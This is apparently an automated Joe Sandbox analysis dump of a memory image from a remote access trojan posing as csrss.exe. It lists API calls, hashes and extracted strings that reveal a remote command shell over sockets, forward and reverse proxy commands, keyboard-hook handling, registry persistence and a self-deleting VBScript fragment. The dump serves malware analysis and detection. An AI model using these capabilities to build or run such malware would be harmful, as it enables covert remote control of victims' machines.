                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,?), ref: 33D7A8D2
                                                      • GetLastError.KERNEL32 ref: 33D7A8DC
                                                      • __dosmaperr.LIBCMT ref: 33D7A8E3
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 33D7A926
                                                      • GetLastError.KERNEL32 ref: 33D7A930
                                                      • __dosmaperr.LIBCMT ref: 33D7A937
                                                      • _free.LIBCMT ref: 33D7A943
                                                      • _free.LIBCMT ref: 33D7A94A
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                      • String ID:
                                                      • API String ID: 2441525078-0
                                                      • Opcode ID: 30944464e3eddbf9cd85665fc6bd988199de00cdc213f1e8af939310fdd0377f
                                                      • Instruction ID: f1e809447cd22ff97d72b7fa68284d7cb6a74229513950d0077238e3cb70e7a1
                                                      • Opcode Fuzzy Hash: 30944464e3eddbf9cd85665fc6bd988199de00cdc213f1e8af939310fdd0377f
                                                      • Instruction Fuzzy Hash: CB31C0B680430ABFEF019FA4CC44D9F3B6CEF05B65B544259F9206A690DB32C911DBB0
                                                      APIs
                                                        • Part of subcall function 33D52850: TerminateProcess.KERNEL32(00000000,pth_unenc,33D4F8C8), ref: 33D52860
                                                        • Part of subcall function 33D52850: WaitForSingleObject.KERNEL32(000000FF), ref: 33D52873
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 33D4D1A5
                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 33D4D1B8
                                                        • Part of subcall function 33D4B8AC: TerminateThread.KERNEL32(33D4A27D,00000000,33DB52F0,pth_unenc,33D4D0B8,@{t,33DB52F0,?,pth_unenc), ref: 33D4B8BB
                                                        • Part of subcall function 33D4B8AC: UnhookWindowsHookEx.USER32(33DB50F0), ref: 33D4B8C7
                                                        • Part of subcall function 33D4B8AC: TerminateThread.KERNEL32(33D4A267,00000000,?,pth_unenc), ref: 33D4B8D5
                                                        • Part of subcall function 33D5B978: GetCurrentProcessId.KERNEL32(00000000,33D9928C,00000000,?,?,?,?,33DA6468,33D4D20D,33DA6F7C), ref: 33D5B99F
                                                      • ShellExecuteW.SHELL32(00000000,33DA6108,00000000,33DA6468,33DA6468,00000000), ref: 33D4D412
                                                      • ExitProcess.KERNEL32 ref: 33D4D419
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ProcessTerminate$Thread$CurrentDeleteExecuteExitFileHookModuleNameObjectShellSingleUnhookWaitWindows
                                                      • String ID: @{t$On Error Resume Next$fso.DeleteFolder "$pth_unenc$while fso.FileExists("
                                                      • API String ID: 97251228-2268932122
                                                      • Opcode ID: 11be5dd9c92e361c9e5eb766ce30c681dbb008febd24ec25ecda362c74fe54dc
                                                      • Instruction ID: e2af9dad2775219dd1b12d9d57614d335e53ba415dd20b504547f9ea4ed979c6
                                                      • Opcode Fuzzy Hash: 11be5dd9c92e361c9e5eb766ce30c681dbb008febd24ec25ecda362c74fe54dc
                                                      • Instruction Fuzzy Hash: D281C472A043009FDB15EB75C850AAFB7E9AF95200F50441DF19697996EF309E0EC7B2
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 33D52106
                                                        • Part of subcall function 33D53877: RegCreateKeyA.ADVAPI32(80000001,00000000,33DA60A4), ref: 33D53885
                                                        • Part of subcall function 33D53877: RegSetValueExA.KERNEL32(33DA60A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,33D4C152,33DA6C48,00000001,000000AF,33DA60A4), ref: 33D538A0
                                                        • Part of subcall function 33D53877: RegCloseKey.ADVAPI32(33DA60A4,?,?,?,33D4C152,33DA6C48,00000001,000000AF,33DA60A4), ref: 33D538AB
                                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 33D52146
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D52155
                                                      • CreateThread.KERNEL32(00000000,00000000,33D527EE,00000000,00000000,00000000), ref: 33D521AB
                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 33D5241A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                      • String ID: @{t$WDH
                                                      • API String ID: 3018269243-509694709
                                                      • Opcode ID: ca2a93cef428e9ec4eafb0056eab1a988ea3f884a3948619545cb6f44c410e91
                                                      • Instruction ID: f4e1b06839f9b02f566619b7b4f716f16598260a8ffde60ffd28d9e416c2027c
                                                      • Opcode Fuzzy Hash: ca2a93cef428e9ec4eafb0056eab1a988ea3f884a3948619545cb6f44c410e91
                                                      • Instruction Fuzzy Hash: 08719332D043019BEA18FB75C95596EB7F5AFE1250F40052DF49393991EF609A0DCBB2
                                                      APIs
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,H#z,00000005,00000004,00000000,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,33DA739C,00000000,0000000E), ref: 33D4CE20
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 33D4CF6E
                                                      • CloseHandle.KERNEL32 ref: 33D4D02D
                                                      • ShellExecuteW.SHELL32(00000000,33DA6108,00000000,33DA6468,33DA6468,00000001), ref: 33D4D04B
                                                      • ExitProcess.KERNEL32 ref: 33D4D062
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$CloseExecuteExitHandleProcessShell
                                                      • String ID: 6$@{t$C:\Users\user\AppData\Roaming\csrss.exe$H#z
                                                      • API String ID: 2323119506-1557855327
                                                      • Opcode ID: ee5e85405fcfe19624bd6b89c16ab5001f797ccbf721f93389aca1de0519ac0a
                                                      • Instruction ID: d02e0d1c42744aa6f0e394599989ac885442a683f7ccf80960629f6d2d66baa4
                                                      • Opcode Fuzzy Hash: ee5e85405fcfe19624bd6b89c16ab5001f797ccbf721f93389aca1de0519ac0a
                                                      • Instruction Fuzzy Hash: 07512562A49301BBDA48E735CC50F6F7BAD6F84A21F44041DF14697EC2EF649D068376
                                                      APIs
                                                      • _free.LIBCMT ref: 33D88135
                                                        • Part of subcall function 33D86782: HeapFree.KERNEL32(00000000,00000000), ref: 33D86798
                                                        • Part of subcall function 33D86782: GetLastError.KERNEL32(?,?,33D90C6F,?,00000000,?,00000000,?,33D90F13,?,00000007,?,?,33D9145E,?,?), ref: 33D867AA
                                                      • _free.LIBCMT ref: 33D88141
                                                      • _free.LIBCMT ref: 33D8814C
                                                      • _free.LIBCMT ref: 33D88157
                                                      • _free.LIBCMT ref: 33D88162
                                                      • _free.LIBCMT ref: 33D8816D
                                                      • _free.LIBCMT ref: 33D88178
                                                      • _free.LIBCMT ref: 33D88183
                                                      • _free.LIBCMT ref: 33D8818E
                                                      • _free.LIBCMT ref: 33D8819C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 9bf08c783583dd471ef92c5d4d56aa657e5436e5bdea1d50dd12223246095533
                                                      • Instruction ID: 9c0187963db34078d915e774afb70d25a924671afb7717781a67fac1cc0e6a8b
                                                      • Opcode Fuzzy Hash: 9bf08c783583dd471ef92c5d4d56aa657e5436e5bdea1d50dd12223246095533
                                                      • Instruction Fuzzy Hash: 7311637A90020CAFCB01DF55CD42CD93BA5BF04267B5140A5BA588FA21DA31EF509BE4
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,H#z,?,33DB5338), ref: 33D4F48E
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 33D4F4B9
                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 33D4F4D5
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 33D4F554
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D4F563
                                                        • Part of subcall function 33D5C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 33D5C1F5
                                                        • Part of subcall function 33D5C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 33D5C208
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D4F66E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                      • String ID: @{t$H#z
                                                      • API String ID: 3756808967-3949992536
                                                      • Opcode ID: dd461a2c1a6ff62700f5c2c7288b3569f5be7ee983a02b5aea77c9509c1ce66d
                                                      • Instruction ID: f2abb689b8f0e5f2ed25c86e77cd6ee86033458d2dafcc55375d0d55055a3a3b
                                                      • Opcode Fuzzy Hash: dd461a2c1a6ff62700f5c2c7288b3569f5be7ee983a02b5aea77c9509c1ce66d
                                                      • Instruction Fuzzy Hash: EA714F319083419FDB14EF71D890EAEBBE9AF94640F40091DF5C6479A2EF34994ECB62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 65535$udp
                                                      • API String ID: 0-1267037602
                                                      • Opcode ID: 9178808a1a156b4edbb27191d82bb1b7677639716f355d8a2e4828a00f1ac326
                                                      • Instruction ID: 550a7f6bff2f22228d1212a6c4f24a73b7c7bac58964d619d374ad94dcecfa3c
                                                      • Opcode Fuzzy Hash: 9178808a1a156b4edbb27191d82bb1b7677639716f355d8a2e4828a00f1ac326
                                                      • Instruction Fuzzy Hash: F351D4B96053059FFB019F6AC904B7B37F8AF84F90F49482AF8C097290DB65D8C18663
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b81aa17513fd8e72e0a1187b67e17f3cf69875b5463c1453288d224ff180ce2d
                                                      • Instruction ID: 1028b794b912c13eb661f91f4ed802462bfaeb131e38de05a7c4f779ade2fa21
                                                      • Opcode Fuzzy Hash: b81aa17513fd8e72e0a1187b67e17f3cf69875b5463c1453288d224ff180ce2d
                                                      • Instruction Fuzzy Hash: 49C1A2B6E04349EFEB01DFA8C841BADBBF4AF09710F484195E954AF285C734A946CB71
                                                      APIs
                                                        • Part of subcall function 33D52850: TerminateProcess.KERNEL32(00000000,pth_unenc,33D4F8C8), ref: 33D52860
                                                        • Part of subcall function 33D52850: WaitForSingleObject.KERNEL32(000000FF), ref: 33D52873
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 33D4D51D
                                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 33D4D530
                                                        • Part of subcall function 33D4B8AC: TerminateThread.KERNEL32(33D4A27D,00000000,33DB52F0,pth_unenc,33D4D0B8,@{t,33DB52F0,?,pth_unenc), ref: 33D4B8BB
                                                        • Part of subcall function 33D4B8AC: UnhookWindowsHookEx.USER32(33DB50F0), ref: 33D4B8C7
                                                        • Part of subcall function 33D4B8AC: TerminateThread.KERNEL32(33D4A267,00000000,?,pth_unenc), ref: 33D4B8D5
                                                        • Part of subcall function 33D5C3F1: CreateFileW.KERNEL32(00000080,40000000,00000000,00000000,00000002,00000080,00000000), ref: 33D5C430
                                                      • ShellExecuteW.SHELL32(00000000,33DA6108,00000000,33DA6468,33DA6468,00000000), ref: 33D4D7C4
                                                      • ExitProcess.KERNEL32 ref: 33D4D7D0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Terminate$FileProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                      • String ID: On Error Resume Next$fso.DeleteFolder "$while fso.FileExists("
                                                      • API String ID: 1454597144-3131565726
                                                      • Opcode ID: 5b1d196b7efd95aa3dea21f2c65bc5f6ba6c5828d4784a99bd280c1f657be264
                                                      • Instruction ID: 6086234df79300c0d3d2b0b246ee18a1e7cd98ac8f48f246f340249f3cd82f18
                                                      • Opcode Fuzzy Hash: 5b1d196b7efd95aa3dea21f2c65bc5f6ba6c5828d4784a99bd280c1f657be264
                                                      • Instruction Fuzzy Hash: 9391AA729043019BD714EB75D890AAFB7E9AFD5200F50042DF18693996FF209E4EC772
                                                      APIs
                                                        • Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
                                                        • Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
                                                        • Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
                                                        • Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293
                                                      • _memcmp.LIBVCRUNTIME ref: 33D85423
                                                      • _free.LIBCMT ref: 33D85494
                                                      • _free.LIBCMT ref: 33D854AD
                                                      • _free.LIBCMT ref: 33D854DF
                                                      • _free.LIBCMT ref: 33D854E8
                                                      • _free.LIBCMT ref: 33D854F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorLast$_abort_memcmp
                                                      • String ID: C
                                                      • API String ID: 1679612858-1037565863
                                                      • Opcode ID: f1252ca559168535bcbdfd65ad7ce99598add91b51cd7333d999a9b424cbbbbb
                                                      • Instruction ID: 7b344026f04582ac6abd868c275c2118abc9d785a95a15c458677ae17e959e04
                                                      • Opcode Fuzzy Hash: f1252ca559168535bcbdfd65ad7ce99598add91b51cd7333d999a9b424cbbbbb
                                                      • Instruction Fuzzy Hash: 5BB12675A01319DBEB24CF28C884B9DB7B5FB08705F5445EAD949AB650EB30BE90CF90
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Eventinet_ntoa
                                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                      • API String ID: 3578746661-168337528
                                                      • Opcode ID: 670054346dd3ea57d300ccb014844e19db8c2d76c624b3bd70fa686e8dd23f3e
                                                      • Instruction ID: 4a613afff4a6e53fdc115ae9c81d66ef7bde9f4541ff6b443d491072d867bc49
                                                      • Opcode Fuzzy Hash: 670054346dd3ea57d300ccb014844e19db8c2d76c624b3bd70fa686e8dd23f3e
                                                      • Instruction Fuzzy Hash: BB51C133F443409BEF04FB79C855A6E37E5AB84680F840529F4529BAD1EF74890AC7E2
                                                      APIs
                                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 33D5B13C
                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,33DA60A4), ref: 33D5B178
                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 33D5B18E
                                                      • SetEvent.KERNEL32 ref: 33D5B219
                                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 33D5B22A
                                                      • CloseHandle.KERNEL32 ref: 33D5B23A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Event$CloseCreateExistsFileHandleObjectPathSendSingleStringWait
                                                      • String ID: open "
                                                      • API String ID: 1811012380-3219617982
                                                      • Opcode ID: c8935526acf714569f6fb560a6fe8383c58d317504cc673c4d90f9c5233f227b
                                                      • Instruction ID: 9f1769b8e220f076eb1f04c01789f645daf0f2dc016fee857439f55b9f32d2d4
                                                      • Opcode Fuzzy Hash: c8935526acf714569f6fb560a6fe8383c58d317504cc673c4d90f9c5233f227b
                                                      • Instruction Fuzzy Hash: 3D51E772A08305AFE604EB79DC91EAF7BECEB84155F40041DF14693991EF204D4ACB76
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @{t$C:\Users\user\AppData\Roaming\csrss.exe$H#z$Rmc-9VASLD
                                                      • API String ID: 0-1173607199
                                                      • Opcode ID: dfef8e602ac1123524f50e361dfa81edb3d70990e18699a92e2d2cf0534090f7
                                                      • Instruction ID: ad174765b3434c043fb8579667d995f19989b05a7196b1984e13fb6648fae3e5
                                                      • Opcode Fuzzy Hash: dfef8e602ac1123524f50e361dfa81edb3d70990e18699a92e2d2cf0534090f7
                                                      • Instruction Fuzzy Hash: 5BF0B4B7A51341DFEE447B7AC9186583BDBA785A82F840415F463EA784EF604802C7A0
                                                      APIs
                                                      • _free.LIBCMT ref: 33D89212
                                                      • _free.LIBCMT ref: 33D89236
                                                      • _free.LIBCMT ref: 33D893BD
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,33D9F234), ref: 33D893CF
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,33DB2764,000000FF,00000000,0000003F,00000000,?,?), ref: 33D89447
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,33DB27B8,000000FF,?,0000003F,00000000,?), ref: 33D89474
                                                      • _free.LIBCMT ref: 33D89589
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 314583886-0
                                                      • Opcode ID: b0cb184d9c5bc10d563eb39b62202f8ca7908d683545e42ca316e357935ba1f0
                                                      • Instruction ID: 620e6eef4182ed27617887f8f39dbc8b5fd75a438ad90bce09033c356f890020
                                                      • Opcode Fuzzy Hash: b0cb184d9c5bc10d563eb39b62202f8ca7908d683545e42ca316e357935ba1f0
                                                      • Instruction Fuzzy Hash: 1DC10876D00345AFDB00DF78C840A9EBBF9EF45760F58019AD4D6AF681E730AA42C7A4
                                                      APIs
                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,33DB6BE8,33DB6CBC), ref: 33D4583F
                                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 33D45897
                                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 33D458BC
                                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 33D458E9
                                                        • Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36
                                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,33DB4F90), ref: 33D459E4
                                                      • Sleep.KERNEL32(00000064,00000062,33DA60A4), ref: 33D459FE
                                                      • TerminateProcess.KERNEL32(00000000), ref: 33D45A17
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: FileProcessSleep$CreateNamedPeekPipeReadTerminateWritesend
                                                      • String ID:
                                                      • API String ID: 729113801-0
                                                      • Opcode ID: c143c6364469f60a1f0d57defcc9c62958467c9a291bb1b9dd60367d8a8d6088
                                                      • Instruction ID: ffc27cffadb99e96566070a36bed79cabfc072c27e5140571e4da3949cce66d6
                                                      • Opcode Fuzzy Hash: c143c6364469f60a1f0d57defcc9c62958467c9a291bb1b9dd60367d8a8d6088
                                                      • Instruction Fuzzy Hash: AC91B172A45308EFDB00FF35CC4092E7BFAEB84654F44042DF846A6691EE319C5A8B75
                                                      APIs
                                                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,33D9405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 33D93E2F
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,33D9405C,00000000,00000000,?,00000001,?,?,?,?), ref: 33D93EB2
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,33D9405C,?,33D9405C,00000000,00000000,?,00000001,?,?,?,?), ref: 33D93F45
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,33D9405C,00000000,00000000,?,00000001,?,?,?,?), ref: 33D93F5C
                                                        • Part of subcall function 33D86137: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 33D86169
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,33D9405C,00000000,00000000,?,00000001,?,?,?,?), ref: 33D93FD8
                                                      • __freea.LIBCMT ref: 33D94003
                                                      • __freea.LIBCMT ref: 33D9400F
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                      • String ID:
                                                      • API String ID: 2829977744-0
                                                      • Opcode ID: 3218417feb4893ff91f44422147c609837075b7f749d229d8da2e31601d3983f
                                                      • Instruction ID: b1eabc6441e076627bc869ee8fdd7ce7415a2f535504f47735caa27761ae37cf
                                                      • Opcode Fuzzy Hash: 3218417feb4893ff91f44422147c609837075b7f749d229d8da2e31601d3983f
                                                      • Instruction Fuzzy Hash: D991C476E003169FFB108EA5CC80EEEBBB5EF09B54F580659E945E7580DB35D881C7A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: udp
                                                      • API String ID: 0-4243565622
                                                      • Opcode ID: 6e935150370a5011039c95617c82f610bd07b7401c842c193c48da4932cfac33
                                                      • Instruction ID: 86be041aee42be33068efca7c1b3c13b4b894131f6c2eedf9bcc21bb076b0992
                                                      • Opcode Fuzzy Hash: 6e935150370a5011039c95617c82f610bd07b7401c842c193c48da4932cfac33
                                                      • Instruction Fuzzy Hash: 5D7159B9A093028FFB15CF16C481A2AB7F4BF84B95F44442EF89597250EB74C984CB93
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 0fe1d9f15b206b29a3724329f4714f99dc18f46781dc24394692ccec78370bc4
                                                      • Instruction ID: b9897380fa4f8c410126b2ddfd46d8a2fb5e18d8e5bff661b2d7091aa633d0ce
                                                      • Opcode Fuzzy Hash: 0fe1d9f15b206b29a3724329f4714f99dc18f46781dc24394692ccec78370bc4
                                                      • Instruction Fuzzy Hash: BA61D675D00305AFEB11CF68E841BDEBBF4EF09768F144169D954EB641E734AD418B90
                                                      APIs
                                                      • GetConsoleCP.KERNEL32 ref: 33D8B3FE
                                                      • __fassign.LIBCMT ref: 33D8B479
                                                      • __fassign.LIBCMT ref: 33D8B494
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,33D80BEE,00000001,00000001,00000005,00000000,00000000), ref: 33D8B4BA
                                                      • WriteFile.KERNEL32(?,00000001,00000000,33D8BB31,00000000), ref: 33D8B4D9
                                                      • WriteFile.KERNEL32(?,33D758B0,00000001,33D8BB31,00000000), ref: 33D8B512
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: 8914511d6d4373746e744627a8e6c394b4b5ed19ebfa9fb10eadf1e9722ce9b2
                                                      • Instruction ID: fe70260e32e1a6aecfd2c14901bbeebd1dd11e8fd6a24322f389213afd76f790
                                                      • Opcode Fuzzy Hash: 8914511d6d4373746e744627a8e6c394b4b5ed19ebfa9fb10eadf1e9722ce9b2
                                                      • Instruction Fuzzy Hash: 7151A5B5D002499FDB10CFA8C891AEEBBF8EF09711F14415AE965EB281E730E945CB60
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 33D57DDC
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D57DE5
                                                      • DeleteFileA.KERNEL32(00000000), ref: 33D57DF4
                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 33D57DA8
                                                        • Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                      • String ID: <$@
                                                      • API String ID: 1107811701-1426351568
                                                      • Opcode ID: d95313b4cfa0c7101be8bcc2a2f7f9adb9f67e7760c230f93ce84679a76be05c
                                                      • Instruction ID: c2b6a111e0fc4eba4b27edeee4c16601fde101faf9ccc2050e83deddc2c2fd83
                                                      • Opcode Fuzzy Hash: d95313b4cfa0c7101be8bcc2a2f7f9adb9f67e7760c230f93ce84679a76be05c
                                                      • Instruction Fuzzy Hash: 3D41AD32D403099BDF04EBA5DC55AFEB779AF50314F900168F506668E0EF741B9ACBA1
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 33D57DDC
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D57DE5
                                                      • DeleteFileA.KERNEL32(00000000), ref: 33D57DF4
                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 33D57DA8
                                                        • Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                      • String ID: <$@
